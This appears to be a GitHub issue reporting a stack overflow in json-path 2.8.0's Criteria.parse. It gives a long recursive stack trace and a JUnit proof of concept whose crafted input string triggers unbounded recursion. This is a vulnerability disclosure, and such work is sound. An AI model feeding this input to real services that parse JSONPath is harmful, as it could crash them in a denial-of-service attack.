Stack Overflow (Criteria.parse)

# Stack Overflow (Criteria.parse)

## Description

A stack overflow vulnerability exists in the Criteria.parse method in json-path 2.8.0. Specially crafted input can cause uncontrolled recursion, resulting in stack overflow.

## Error Log

```
java.lang.StackOverflowError
	at java.base/java.util.Collections$SingletonList.<init>(Collections.java:4837)
	at java.base/java.util.Collections.singletonList(Collections.java:4823)
	at com.jayway.jsonpath.internal.path.PathTokenFactory.createSinglePropertyPathToken(PathTokenFactory.java:18)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:253)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
	at com.jayway.jsonpath.internal.path.PathCompiler.readBracketPropertyToken(PathCompiler.java:634)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:137)
	at com.jayway.jsonpath.internal.path.PathCompiler.readPropertyOrFunctionToken(PathCompiler.java:256)
	at com.jayway.jsonpath.internal.path.PathCompiler.readNextToken(PathCompiler.java:153)
```

## PoC
```xml
<dependency>
<groupId>com.jayway.jsonpath</groupId>
<artifactId>json-path</artifactId>
<version>2.8.0</version>
</dependency>
```


```java
import com.jayway.jsonpath.Criteria;
import org.junit.Test;

public class CriteriaFuzzerParse {
    @Test
    public void parseFuzzerTest() {
        try {
            Criteria result = Criteria.parse("@[\"\",/\\");
        } catch (Exception e) {
        }
    }
}
```


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Stack Overflow (Criteria.parse) #973

Stack Overflow (Criteria.parse)

Description

Error Log

PoC

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Stack Overflow (Criteria.parse) #973

Description

Stack Overflow (Criteria.parse)

Description

Error Log

PoC

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions